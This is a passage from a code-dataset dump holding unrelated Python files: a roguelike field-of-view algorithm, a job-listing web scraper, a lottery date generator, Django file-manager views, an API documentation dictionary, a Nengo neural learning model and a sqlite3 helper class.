res}\\n\"\n","repo_name":"mobyw/nonebot-general-rss","sub_path":"src/plugins/nonebot-general-rss/RSS/routes/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"37960503479","text":"import dataclasses\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Any, Callable, List, Set, Tuple\n\n__all__ = [\"FOV\"]\n\n\n@dataclasses.dataclass\nclass Angles:\n start: float\n middle: float\n end: float\n\n\nclass FOV:\n def __init__(\n self, radius, tile_visible_func: Callable, set_tile_visible_func: Callable\n ):\n self.radius = radius\n self.tile_visible_func = tile_visible_func\n self.set_tile_visible_func = set_tile_visible_func\n\n def check_visibility(self, x: int, y: int, tiles: List[List[Any]]):\n tiles[y][x].set_visible(True)\n positions = self._check_y(x, y, -1, -1, tiles)\n positions.update(self._check_y(x, y, 1, -1, tiles))\n positions.update(self._check_y(x, y, -1, 1, tiles))\n positions.update(self._check_y(x, y, 1, 1, tiles))\n positions.update(self._check_x(x, y, -1, 1, tiles))\n positions.update(self._check_x(x, y, 1, 1, tiles))\n positions.update(self._check_x(x, y, -1, -1, tiles))\n positions.update(self._check_x(x, y, 1, -1, tiles))\n for row in positions:\n x, y = row\n self.set_tile_visible_func(tiles[y][x], True)\n\n def _is_visible(self, angles: Angles, walls: List[Angles], is_wall: bool) -> bool:\n start_vis: bool = True\n mid_vis: bool = True\n end_vis: bool = True\n\n for wall in walls:\n if wall.start <= angles.start <= wall.end:\n start_vis = False\n if wall.start <= angles.middle <= wall.end:\n mid_vis = False\n if wall.start <= angles.end <= wall.end:\n end_vis = False\n\n if is_wall:\n return start_vis or mid_vis or end_vis\n else:\n return (start_vis and mid_vis) or (mid_vis and end_vis)\n\n def _add_wall(self, walls: List[Angles], new: Angles) -> List[Angles]:\n angle: Angles = Angles(new.start, new.middle, new.end)\n new_walls: List[Angles] = [\n wall for wall in walls if not self._combine(wall, angle)\n ]\n new_walls.append(angle)\n return new_walls\n\n def _combine(self, old: Angles, new: Angles) -> bool:\n low: Angles\n high: Angles\n # if their near values are equal, they overlap\n if old.start < new.start:\n low = old\n high = new\n elif new.start < old.start:\n low = new\n high = old\n else:\n new.end = max(old.end, new.end)\n return True\n\n # If they overlap, combine and return True\n if low.end >= high.start:\n new.start = min(low.start, high.start)\n new.end = max(low.end, high.end)\n return True\n\n return False\n\n def _check_y(\n self, px: int, py: int, dx: int, dy: int, tiles: List[List[Any]]\n ) -> Set[Tuple[int, int]]:\n count = 1\n positions: Set[Tuple[int, int]] = set()\n start_y = py + dy\n height = len(tiles)\n width = len(tiles[0])\n walls: List[Angles] = []\n for y in range(0, self.radius):\n new_y = start_y + y * dy\n if 0 <= new_y < height:\n number_of_cells = count\n for x in range(0, count * dx + dx, dx):\n new_x = px + x\n if 0 <= new_x < width:\n angle_range = 1.0 / number_of_cells\n start_angle = abs(x) * angle_range\n middle_angle = start_angle + (angle_range / 2.0)\n end_angle = start_angle + angle_range\n is_wall = self.tile_visible_func(tiles[new_y][new_x])\n obj: Angles = Angles(start_angle, middle_angle, end_angle)\n if self._is_visible(obj, walls, is_wall):\n positions.add((new_x, new_y))\n if is_wall:\n walls = self._add_wall(\n walls, Angles(start_angle, middle_angle, end_angle)\n )\n 
else:\n walls = self._add_wall(\n walls, Angles(start_angle, middle_angle, end_angle)\n )\n count += 1\n return positions\n\n def _check_x(\n self, px: int, py: int, dx: int, dy: int, tiles: List[List[Any]]\n ) -> Set[Tuple[int, int]]:\n count = 1\n positions: Set[Tuple[int, int]] = set()\n start_x = px + dx\n height = len(tiles)\n width = len(tiles[0])\n walls: List[Angles] = []\n for x in range(0, self.radius):\n new_x = start_x + x * dx\n if 0 <= new_x < width:\n number_of_cells = count\n for y in range(0, count * dy + dy, dy):\n new_y = py + y\n if 0 <= new_y < height:\n angle_range = 1.0 / number_of_cells\n start_angle = abs(y) * angle_range\n middle_angle = start_angle + (angle_range / 2.0)\n end_angle = start_angle + angle_range\n is_wall = self.tile_visible_func(tiles[new_y][new_x])\n obj: Angles = Angles(start_angle, middle_angle, end_angle)\n if self._is_visible(obj, walls, is_wall):\n positions.add((new_x, new_y))\n if is_wall:\n walls = self._add_wall(\n walls, Angles(start_angle, middle_angle, end_angle)\n )\n else:\n walls = self._add_wall(\n walls, Angles(start_angle, middle_angle, end_angle)\n )\n count += 1\n return positions\n","repo_name":"PurityLake/PortalInTheDepths","sub_path":"pitd/fov/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22619148269","text":"import bs4\nimport pandas\nimport requests\nfrom tqdm import tqdm\nfrom fake_headers import Headers\n\nimport json\nfrom time import sleep\nfrom pprint import pprint\n\nheaders = Headers(browser='firefox', os='win')\nheaders_data = headers.generate()\n\nall_vacancy = []\n\nfor p in tqdm(range(9)):\n\n sleep(0.1)\n\n url = f'https://spb.hh.ru/search/vacancy?text=python+and+Django+and+Flask&salary=&area=2&area=1&' \\\n f'no_magic=true&ored_clusters=true&items_on_page=20&excluded_text=&page={p}'\n\n response = requests.get(url, headers=headers_data)\n\n html_data = bs4.BeautifulSoup(response.text, 'lxml')\n\n for vacancy in html_data.findAll('div', class_=\"vacancy-serp-item-body__main-info\"):\n\n vacancy_name = vacancy.find('a', class_=\"serp-item__title\").text.strip()\n\n vacancy_href = vacancy.find('a').get('href')\n\n try:\n\n vacancy_offer = vacancy.find('span', class_=\"bloko-header-section-3\").text.replace('\\u202f', ' ')\n\n except AttributeError:\n\n vacancy_offer = 'Зарплата не указана.'\n\n vacancy_company = vacancy.find('a', class_=\"bloko-link bloko-link_kind-tertiary\").text.replace('\\xa0', ' ')\n\n vacancy_town = vacancy.findAll('div', class_=\"bloko-text\")[-1].text.split(',')[0]\n\n all_vacancy.append([vacancy_name, vacancy_href, vacancy_offer, vacancy_company, vacancy_town])\n\n\n# Запись файла в формат JSON\n\nwith open('vacancies.json', 'w') as file:\n json.dump(all_vacancy, file, ensure_ascii=False, indent=2)\n\n\n# Запись файла в формат CSV\n\nheader = ['position', 'reference', 'offer', 'company', 'town']\n\ndf = pandas.DataFrame(all_vacancy, columns=header)\ndf.to_csv('vacancies.csv', sep=',', encoding='utf8')","repo_name":"s-alex-developer/Netology_HomeWorks","sub_path":"web_scraping/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1899275475","text":"from datetime import date, timedelta, datetime\r\nnumbers = list(range(0, 12000))\r\npast = 10\r\n\r\ndef lotto_date_generator(num, p=0):\r\n #lotto_days = [1, 3, 5]\r\n 
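    # Note: date.weekday() numbers days Monday=0 through Sunday=6, so the
    # commented presets keep Tue/Thu/Sat ([1, 3, 5]) or Wed/Sat ([2, 5]) draws,
    # while the active [6] keeps Sundays only.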
#lotto_days = [2, 5]\r\n lotto_days = [6]\r\n return [str(date.today() - timedelta(days = p) - timedelta(days = n)) for n in numbers if (date.today() - timedelta(days = p) - timedelta(days = n)).weekday() in lotto_days]\r\n\r\ndates = lotto_date_generator(numbers, 13667)\r\nprint(dates)\r\nprint(len(dates), (len(dates) * 8.5) / 3600 )","repo_name":"Bartelix/lotto","sub_path":"date_generator.py","file_name":"date_generator.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13950827870","text":"import json\nimport os\nimport subprocess\n\nfrom django.contrib.auth import get_backends\nfrom django.contrib.auth.models import User\nfrom django.http import (Http404, HttpResponse, HttpResponseBadRequest,\n HttpResponseForbidden, HttpResponseNotFound)\nfrom django.shortcuts import get_object_or_404, render\nfrom django.template import RequestContext, loader\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import (csrf_exempt, ensure_csrf_cookie,\n requires_csrf_token)\nfrom django.views.decorators.http import condition, require_GET, require_POST\n\nfrom .utils import FileOperations\n\n\n@requires_csrf_token\n@require_POST\ndef permissions_save(request, folder, path):\n settings = {}\n method = request.POST.get(\"permission_scheme\")\n if not method:\n return HttpResponseBadRequest(\"Missing method \"+json.dumps(request.POST))\n if method == \"Public\":\n settings[\"mode\"] = \"public\"\n if method == \"Futurice SSO\":\n settings[\"mode\"] = \"sso\"\n if method == \"Static account\":\n settings[\"mode\"] = \"basicauth\"\n if not request.POST.get(\"password\") or not request.POST.get(\"username\"):\n return HttpResponseBadRequest(\"Missing username or password\")\n settings[\"username\"] = request.POST.get(\"username\")\n settings[\"password\"] = request.POST.get(\"password\")\n data = FileOperations.save_permissions(request.user.username, folder, path, settings)\n\n return JSONResponse(data, {}, response_mimetype(request))\n\n\n@ensure_csrf_cookie\n@require_GET\ndef main(request, template_name):\n ret_dict = {\"homefolder_exists\": True}\n if not FileOperations.valid_file(request.user.username, \"public_html\", \"\"):\n ret_dict[\"homefolder_exists\"] = False\n return render(request, template_name, context=ret_dict)\n \n@ensure_csrf_cookie\n@require_GET\ndef browse(request, folder, path, template_name):\n if not FileOperations.valid_file(request.user.username, folder, path):\n raise Http404\n path = path.replace(\"//\", \"/\")\n path_parts = []\n path_parts_temp = path.split(\"/\")\n path_construct = \"\"\n for item in path_parts_temp[:-1]:\n path_construct = \"%s/%s\" % (path_construct, item)\n path_parts.append((path_construct, item))\n\n ret_dict = {\"folder\": folder, \"path\": path, \"path_parts\": path_parts, \"current_path\": path_parts_temp[-1] }\n return render(request, template_name, context=ret_dict)\n\n@ensure_csrf_cookie\n@requires_csrf_token\ndef upload(request, folder, path):\n data = []\n def get_return_dict(file):\n return {\"name\": file.get(\"filename\"), \"size\": file.get(\"size\"), 'url': url, \"mtime\": file.get(\"mtime\", 0), \"mtime_readable\": file.get(\"mtime_readable\", \"-\"), 'delete_url': reverse(\"delete\", args=[folder, path+\"/\"+file.get(\"filename\")]), \"delete_type\": \"POST\"}\n\n if request.FILES:\n files = request.FILES.get(\"files[]\")\n else:\n files = FileOperations.get_files(request.user.username, folder, path)\n for file in files:\n 
if os.path.isdir(file.get(\"full_path\")):\n url = reverse(\"browse\", args=[folder, path+\"/\"+ file.get(\"filename\")])\n else:\n if folder == \"public_html\":\n url = \"http://public.futurice.com/~%s/%s/%s\" % (request.user.username, path, file.get(\"filename\"))\n else:\n url = \"/~%s/%s/%s\" % (request.user.username, path, file.get(\"filename\"))\n data.append(get_return_dict(file))\n return JSONResponse(data, {}, response_mimetype(request))\n f = files\n FileOperations.upload_file(f, request.user.username, folder, path)\n\n file = FileOperations.get_file(request.user.username, folder, path, f.name)\n if os.path.isdir(file.get(\"full_path\")):\n url = reverse(\"browse\", args=[folder, path+\"/\"+ file.get(\"filename\")])\n else:\n if folder == \"public_html\":\n url = \"http://public.futurice.com/~%s/%s/%s\" % (request.user.username, path, file.get(\"filename\"))\n else:\n url = f\"/~{request.user.username}/{path}/{file.get('filename')}\"\n data.append(get_return_dict(file))\n response = JSONResponse(data, {}, response_mimetype(request))\n response['Content-Disposition'] = 'inline; filename=files.json'\n return response\n\n@require_POST\n@ensure_csrf_cookie\n@requires_csrf_token\ndef delete(request, folder, path):\n return JSONResponse(FileOperations.delete_file(request.user.username, folder, path), {}, response_mimetype(request))\n\n@require_POST\n@ensure_csrf_cookie\n@requires_csrf_token\ndef mkdir(request, folder, path):\n pathname = request.POST.get(\"pathname\")\n if not pathname:\n return HttpResponseBadRequest(\"Missing pathname\")\n\n data = FileOperations.mkdir(request.user.username, folder, path, pathname)\n if data.get(\"success\"):\n data[\"redirect\"] = reverse(\"browse\", args=[folder, path+\"/\"+pathname])\n return JSONResponse(data, {}, response_mimetype(request))\n\nclass JSONResponse(HttpResponse):\n \"\"\"JSON response class.\"\"\"\n def __init__(self,obj='',json_opts={},mimetype=\"application/json\",*args,**kwargs):\n content = json.dumps(obj,**json_opts)\n super(JSONResponse,self).__init__(content,mimetype,*args,**kwargs)\n\ndef response_mimetype(request):\n if \"application/json\" in request.META['HTTP_ACCEPT']:\n return \"application/json\"\n else:\n return \"text/plain\"\n","repo_name":"ojarva/file-manager-django","sub_path":"filemanager/files/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5435,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"73073300587","text":"from actinia_core.models.response_models import (\n LockedMapsetListResponseModel,\n SimpleResponseModel,\n)\n\n__license__ = \"GPLv3\"\n__author__ = \"Julia Haas, Guido Riembauer, Anika Weinmann\"\n__copyright__ = \"Copyright 2021-2022, mundialis GmbH & Co. KG\"\n__maintainer__ = \"mundialis GmbH & Co. KG\"\n\nget_doc = {\n \"tags\": [\"Mapsets\"],\n \"description\": \"List available or locked mapsets.\",\n \"parameters\": [\n {\n \"in\": \"path\",\n \"name\": \"mapsets\",\n \"type\": \"string\",\n \"description\": \"List all mapsets in the global database available \"\n \"to the authenticated user.\",\n },\n {\n \"in\": \"path\",\n \"name\": \"status\",\n \"type\": \"string\",\n \"description\": (\n \"If set to 'locked', list all locked mapsets across \"\n \"all locations. Minimum required user role: admin.\"\n ),\n },\n {\n \"in\": \"path\",\n \"name\": \"user\",\n \"type\": \"string\",\n \"description\": (\n \"List all mapsets in the global database available \"\n \"to the specified user. 
\"\n \"Minimum required user role: admin\"\n ),\n },\n ],\n \"responses\": {\n \"200\": {\n \"description\": \"Returns a list of available (or locked) mapsets \",\n \"schema\": LockedMapsetListResponseModel,\n },\n \"500\": {\n \"description\": \"The error message and a detailed error log\",\n \"schema\": SimpleResponseModel,\n },\n },\n}\n","repo_name":"actinia-org/actinia-api","sub_path":"src/actinia_api/swagger2/actinia_core/apidocs/mapsets.py","file_name":"mapsets.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"15496794916","text":"# single concatenated vector input with voja\n# used for making plot showing decoders continually switching back and forth\n\nfrom utils import gen_env_list, gen_vocab\nfrom hetero_mem import build_hetero_mem, encoders\nfrom constants import n_neurons, D, dt\n\nimport nengo\nfrom nengo import spa\n\nimport numpy as np\n\nplot_res = False\n\n# Learning rates\npes_rate = 0.01\nvoja_rate = 0.005\n\n## Generate the vocab\nrng = np.random.RandomState(0)\nnumber_dict = {\"ONE\":1, \"TWO\":2, \"THREE\":3, \"FOUR\":4, \"FIVE\":5,\n \"SIX\":6, \"SEVEN\":7, \"EIGHT\":8, \"NINE\":9}\n\nmax_sum = 5\nmax_num = max_sum - 2\n\nnumber_list, vocab = gen_vocab(number_dict, max_num, D, rng)\n\njoin_num = \"+\".join(number_list[0:max_num])\n\n## Create inputs and expected outputs\nq_list, q_norm_list, ans_list = gen_env_list(number_dict, number_list, vocab, max_sum)\n\nnum_items = len(q_list)\nperiod = 0.3\nrepeats = 5\nT = period * num_items * (1 + repeats)\nshuffled = range(0, len(q_list))\nrng.shuffle(shuffled)\nprint(shuffled)\n\n\ndef shuffle_func(t):\n if round((t % period * num_items) * 1000) == 0:\n rng.shuffle(shuffled)\n\n return shuffled\n\n\ndef cycle_array(x, period, dt=0.001):\n \"\"\"Cycles through the elements\"\"\"\n i_every = int(round(period/dt))\n if i_every != period/dt:\n raise ValueError(\"dt (%s) does not divide period (%s)\" % (dt, period))\n\n def f(t):\n i = int(round((t - dt)/dt)) # t starts at dt\n return x[shuffled[(i/i_every) % len(x)]]\n\n return f\n\n\nwith spa.SPA(vocabs=[vocab], label=\"Fast Net\", seed=0) as model:\n env_keys = nengo.Node(cycle_array(q_norm_list, period, dt))\n env_values = nengo.Node(cycle_array(ans_list, period, dt))\n shuffle_node = nengo.Node(shuffle_func)\n\n recall = nengo.Node(size_in=D)\n learning = nengo.Node(output=lambda t: -int(t >= (T-period*num_items)))\n\n ## Generate hetero mem\n K = 400\n # This is usually calculated\n c = 0.51\n e = encoders(np.array(q_norm_list), K, rng)\n het_mem = build_hetero_mem(D*2, D, e, c, pes_rate=pes_rate, voja_rate=voja_rate)\n\n nengo.Connection(env_keys, het_mem.input, synapse=None)\n nengo.Connection(het_mem.output, recall)\n\n # Create the error population\n error = nengo.Ensemble(n_neurons*8, D)\n nengo.Connection(learning, error.neurons, transform=[[10.0]]*n_neurons*8,\n synapse=None)\n nengo.Connection(learning, het_mem.in_conn.learning_rule, synapse=None)\n\n # Calculate the error and use it to drive the PES rule\n nengo.Connection(env_values, error, transform=-1, synapse=None)\n nengo.Connection(recall, error, synapse=None)\n nengo.Connection(error, het_mem.out_conn.learning_rule)\n\n # Setup probes\n p_keys = nengo.Probe(env_keys, synapse=None, sample_every=0.01)\n p_values = nengo.Probe(env_values, synapse=None, sample_every=0.01)\n p_learning = nengo.Probe(learning, synapse=None, sample_every=0.01)\n p_error = nengo.Probe(error, synapse=0.01)\n p_recall = 
nengo.Probe(recall, synapse=None, sample_every=0.01)\n    p_weights = nengo.Probe(het_mem.out_conn, 'weights', synapse=None, sample_every=0.01)\n\nsim = nengo.Simulator(model, dt=dt)\nsim.run(T)\n\nt = sim.trange()\n\nif plot_res:\n    import matplotlib.pyplot as plt\n\n    # figure out how to put these into a subplot\n    plt.figure()\n    plt.title(\"Error\")\n    plt.plot(t, np.linalg.norm(sim.data[p_error], axis=1))\n\n    plt.figure()\n    plt.title(\"Keys_1\")\n    plt.plot(t, spa.similarity(sim.data[p_keys][:, :D], vocab))\n    plt.legend(vocab.keys, loc='best')\n\n    plt.figure()\n    plt.title(\"Keys_2\")\n    plt.plot(t, spa.similarity(sim.data[p_keys][:, D:], vocab))\n    plt.legend(vocab.keys, loc='best')\n\n    plt.figure()\n    plt.title(\"Result\")\n    plt.plot(t, spa.similarity(sim.data[p_recall], vocab))\n    plt.legend(vocab.keys, loc='best')\n    plt.ylim(-1.5, 1.5)\n\n    plt.figure()\n    plt.title(\"Actual Answer\")\n    plt.plot(t, spa.similarity(sim.data[p_values], vocab))\n    plt.legend(vocab.keys, loc='best')\n    plt.ylim(-1.5, 1.5)\n\n    plt.show()\n\n# I should make a wrapper for doing this quickly\nbase_name = \"hetmem\"\nnp.savez_compressed(\"data/%s_learning_data\" % base_name, p_keys=sim.data[p_keys], p_recall=sim.data[p_recall],\n                    p_error=sim.data[p_error], p_weights=sim.data[p_weights], p_values=sim.data[p_values])\nnp.savez_compressed(\"data/%s_learning_vocab\" % base_name, keys=vocab.keys, vecs=vocab.vectors)\n","repo_name":"Seanny123/counting_to_addition","sub_path":"hetmem_learning.py","file_name":"hetmem_learning.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"}
+{"seq_id":"70569152749","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n'''\n# \"boo\" is short for \"basic or other\", i.e. basics or anything not yet categorized\nCreated: 2018-1-8 08:51:50\n'''\nimport traceback # for capturing error details\nimport sys\nimport os\nimport re\nimport time\nimport datetime\nimport urllib\nimport random\nimport socket\nimport winsound\nimport ssl\nimport json\n# custom HTTPS opener, banner's oracle 10g server supports SSLv3 only\nimport socket\nimport io, gzip\nimport hashlib\nimport sqlite3\nimport threading\n\nsys.path.append(\"..\") # jump to the parent directory\n# sys.path works like this: when an import statement runs, the interpreter searches the directory of the current module plus the paths listed in sys.path for the module being imported\nfrom cnLib import boo\n\n# print \"cnLib\"\n# os.system('pause') # press any key to continue.\n\n# while 1:\n# pass\n\n# print __name__\n\n\n# ---------------------------------------------------------------------------\n\n'''\n# Purpose:\n# Date:\n# Returns: =0 failure, =1 success\n# Parameters:\n# Example: re = demo(u'input argument')\n'''\ndef model(IN):\n    return 1 # return description\n    return None # return description\n    return True # return description\n# ------------------------------------------------------------------\n\n\n'''\nExample:\n# sqlite3 database helper\nclass db_sqlite3:\n\nrt = boo.runtime()\ndbPath = \"D:/tempD/img.db\"\nsql = \"INSERT INTO img (`name2`,`url`,`md5`,`size` ) VALUES (?,'u',?,4);\\n\"\n\ndb = iDatabase.db_sqlite3(\"D:/tempD/img.db\")\ndb.open()\ndb.runSQL_noReturn('DELETE FROM img WHERE size=4 ;')\ndb.fast_ready()\nrt.start()\n# ----------------------------------------------------------\none = {}\ni=1\nnCount = 100\nfor i in range(0,nCount):\n    one['txt'] = \"value to hash %d\" % (i)\n    one['md5'] = md5(one['txt'])\n    one['sql'] = ''\n    db.fast_into(\"INSERT INTO img (`name2`,`url`,`md5`,`size` ) VALUES (?, '', ?, 4 )\", (i, one['md5']))\n# ----------------------------------------------------------\ndb.fast_end()\n\nrt.end()\n# print rt.getRuntime()\nsu = -1\nif rt.getRuntime()> 0:\n    su = nCount/rt.getRuntime()\n\ntxt = \"[total %d s, %d loops] speed = %f loops/s\"%(rt.getRuntime(), nCount, su)\nprint(txt)\n\nprint('done')\n'''\n# sqlite3 database helper\nclass db_sqlite3:\n    __isDebug = False\n    __dataPath = None\n    __conn = None\n    __c = None\n    __fast_count_i = 0\n    __fast_count_max = 10000 # controls how many SQL statements run before one commit to disk and a fast-mode restart\n\n    # ------------------------------------------------------------------\n    # constructor\n    def __init__(self, path=None):\n        # print \"A\"\n        if path:\n            self.setPath(path)\n\n    # ------------------------------------------------------------------\n    # set the debug flag\n    def isDebug(self, TF):\n        self.__isDebug = TF\n\n    # ------------------------------------------------------------------\n    # set the database path\n    def setPath(self, path):\n        self.__dataPath = path\n\n    # ------------------------------------------------------------------\n    # destructor\n    def __del__(self):\n        # print \"Z\"\n        self.close()\n\n    # ------------------------------------------------------------------\n    # open the connection\n    def open(self):\n        try:\n            self.__conn = sqlite3.connect(self.__dataPath)\n            self.__conn.text_factory = str ## !!!\n            self.__c = self.__conn.cursor()\n        except:\n            if self.__isDebug:\n                strArr = []\n                strArr.append(\"\\033[1;31m\")\n                strArr.append(\"open - an error occurred!\\n\")\n                strArr.append(\"calling function: %s\\n\"%(sys._getframe().f_back.f_code.co_name)) # name of the calling function\n                strArr.append(\"current location: %s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name))\n                strArr.append(\"detailed error info:\\n[\\n%s]\\n\"%(traceback.format_exc()))\n                strArr.append(\" \\033[0m!\")\n                boo.show(''.join(strArr))\n\n\n    # ------------------------------------------------------------------\n    # close the connection\n    def close(self):\n        try:\n            self.__conn.commit()\n            self.__conn.close()\n        except:\n            return\n            # if self.__isDebug:\n            #     showStr = \"close - an error occurred!\\n\"\n            #     showStr += \"current location: %s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name)\n            #     errorInfo = traceback.format_exc()\n            #     showStr += \"detailed error info:\\n[\\n\"+errorInfo+\"]\\n\"\n            #     boo.show(showStr)\n\n    # ------------------------------------------------------------------\n    '''\n    Purpose:\n        controls how many SQL statements run before data is flushed to disk once and fast mode restarts\n    Parameters:\n        maxNum  # default = 1000; same control knob as above\n    '''\n    def fast_count_max(self,maxNum):\n        if maxNum > 0:\n            self.__fast_count_max = maxNum\n\n    # ------------------------------------------------------------------\n    '''\n    Purpose:\n        fast mode - prepare/initialize\n    Parameters:\n        maxNum  # default = 1000; controls how many SQL statements run before one commit to disk and a fast-mode restart\n    '''\n    def fast_ready(self, maxNum = 0):\n        # boo.show('fast_ready')\n        try:\n            if maxNum > 0:\n                self.__fast_count_max = maxNum\n\n            self.__c.execute(\"begin;\")\n        except:\n            if self.__isDebug:\n                funcName = sys._getframe().f_back.f_code.co_name # name of the calling function\n                # lineNumber = sys._getframe().f_back.f_lineno # line number\n                # from_funcation = sys._getframe().f_code.co_name # current function name\n                showStr = \"fast mode - prepare/initialize - an error occurred!\\n\"\n                showStr += \"calling function: \" + funcName + \"\\n\"\n                showStr += \"database: \" + self.__dataPath + \"\\n\"\n                showStr += \"current location: %s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name)\n                errorInfo = traceback.format_exc()\n                showStr += \"detailed error info:\\n[\\n\"+errorInfo+\"]\\n\"\n                boo.show(showStr)\n\n    # ------------------------------------------------------------------\n    # fast mode - re-prepare/re-initialize\n    def fast_re_ready(self):\n        # showStr = \"calling function: \" + sys._getframe().f_back.f_code.co_name + \"\\n\"\n        # boo.show('fast mode - re-prepare/re-initialize_fast_re_ready_' + showStr)\n        try:\n            self.__conn.commit()\n            self.__c.execute(\"begin;\")\n        except:\n            if self.__isDebug:\n                showStr = \"fast mode - re-prepare/re-initialize - an error occurred!\\n\"\n                showStr += \"current location: %s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name)\n                errorInfo = traceback.format_exc()\n                showStr += \"detailed error info:\\n[\\n\"+errorInfo+\"]\\n\"\n                boo.show(showStr)\n\n    # ------------------------------------------------------------------\n    # fast mode - execute\n    # returns: the auto-increment row ID after the operation\n    def fast_into(self, sql, paramObj):\n        # boo.show(\"[%d / %d database:%s\" % (self.__fast_count_i, self.__fast_count_max, self.__dataPath))\n        # c.execute(\"INSERT INTO img (`name2`,`url`,`md5`,`size` ) VALUES (?, '', ?, 4 )\", (i, one['md5']))\n        try:\n            if self.__fast_count_max < self.__fast_count_i:\n                # boo.show('fast_re_ready_fast mode - re-prepare/re-initialize')\n                self.fast_re_ready() # commit to disk and restart fast mode\n                self.__fast_count_i = 0\n            # else:\n            #     self.__fast_count_i += 1\n            self.__fast_count_i += 1\n            self.__c.execute(sql, paramObj)\n            return self.__c.lastrowid\n        except:\n            if self.__isDebug:\n                funcName = sys._getframe().f_back.f_code.co_name # name of the calling function\n                # lineNumber = sys._getframe().f_back.f_lineno # line number\n                # from_funcation = sys._getframe().f_code.co_name # current function name\n\n                showStr = \"fast mode - execute - an error occurred!\\n\"\n                showStr += \"calling function: \" + funcName + \"\\n\"\n                showStr += \"database: \" + self.__dataPath + \"\\n\"\n                showStr += \"current location: %s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name)\n                errorInfo = traceback.format_exc()\n                showStr += \"detailed error info:\\n[\\n\"+errorInfo+\"]\\n\"\n                boo.show(showStr)\n\n    # ------------------------------------------------------------------\n    # fast mode - finish/clean up\n    def fast_end(self):\n        try:\n            self.__conn.commit()\n        except:\n            if self.__isDebug:\n                showStr = \"fast mode - finish/clean up - an error occurred!\\n\"\n                showStr += \"current location: %s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name)\n                errorInfo = traceback.format_exc()\n                showStr += \"detailed error info:\\n[\\n\"+errorInfo+\"]\\n\"\n                boo.show(showStr)\n\n    # ------------------------------------------------------------------\n    # get the database cursor\n    def get_c(self):\n        return self.__c\n\n    # ------------------------------------------------------------------\n\n    # ------------------------------------------------------------------\n    # fetch the first row\n    def getData_firstRow(self, sql):\n        try:\n            # cursor = self.__conn.execute(\"SELECT * from `buy5sell5`\")\n            cursor = self.__conn.execute(sql)\n            for row in cursor:\n                return row\n        except:\n            if self.__isDebug:\n                strArr = []\n                strArr.append(\"\\033[1;31m\")\n                strArr.append(\"fetch first row - an error occurred!\\n\")\n                strArr.append(\"current location: %s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name))\n                strArr.append(\"detailed error info:\\n[\\n%s]\\n\"%(traceback.format_exc()))\n                strArr.append(\" \\033[0m!\")\n                boo.show(''.join(strArr))\n        # print(row)\n\n    # fetch multiple rows\n    # maxRow: maximum number of rows to return; =0 means unlimited\n    def getData_more(self, sql,maxRow=0):\n        try:\n            # cursor = self.__conn.execute(\"SELECT * from `buy5sell5`\")\n            cursor = self.__conn.execute(sql)\n            i = 0\n            outArr = [] # the array to return\n            for row in cursor:\n                if 0 == maxRow or i < maxRow:\n                    outArr.append(row)\n                    i += 1\n                else:\n                    return outArr # hit the cap, return early\n\n            return outArr\n\n        except:\n            if self.__isDebug:\n                strArr = []\n                strArr.append(\"\\033[1;31m\")\n                strArr.append(\"fetch rows - an error occurred!\\n\")\n                strArr.append(\"current location: %s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name))\n                strArr.append(\"detailed error info:\\n[\\n%s]\\n\"%(traceback.format_exc()))\n                strArr.append(\" \\033[0m!\")\n                boo.show(''.join(strArr))\n        # print(row)\n\n    # ------------------------------------------------------------------\n\n    # no return value - execute one SQL statement against many parameter sets\n    def runSQL_many_noReturn(self,SQL,paramSeq):\n        try:\n            self.__c.executemany(SQL, paramSeq) # executemany needs a sequence of parameter tuples\n            self.__conn.commit()\n        except:\n            if self.__isDebug:\n                showStr = \"SQL execution error!\\n\"\n                showStr += \"current location: %s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name)\n                errorInfo = traceback.format_exc()\n                showStr += \"detailed error info:\\n[\\n\"+errorInfo+\"]\\n\"\n                boo.show(showStr)\n\n    # no return value - execute a single SQL statement\n    def runSQL_noReturn(self,SQL):\n        try:\n            self.__c.execute(SQL) # execute one SQL statement\n            self.__conn.commit()\n        except:\n            if self.__isDebug:\n                showStr = \"SQL execution error!\\n\"\n                showStr += \"current location: %s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name)\n                errorInfo = traceback.format_exc()\n                showStr += \"detailed error info:\\n[\\n\"+errorInfo+\"]\\n\"\n                boo.show(showStr)\n    # ------------------------------------------------------------------\n\n    # count rows\n    # the SQL must be a COUNT query, e.g. \"SELECT COUNT(*) FROM img_index WHERE state=0 ;\"\n    def countItems(self,SQL):\n        try:\n            # self.__c.execute(\"SELECT COUNT(*) FROM img_index WHERE state=0 ;\")\n            self.__c.execute(SQL)\n            amount = self.__c.fetchone()[0] # fetch the total count\n            return amount\n        except:\n            if self.__isDebug:\n                showStr = \"count query error!\\n\"\n                showStr += \"current location: %s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name)\n                errorInfo = traceback.format_exc()\n                showStr += \"detailed error info:\\n[\\n\"+errorInfo+\"]\\n\"\n                boo.show(showStr)\n\n# 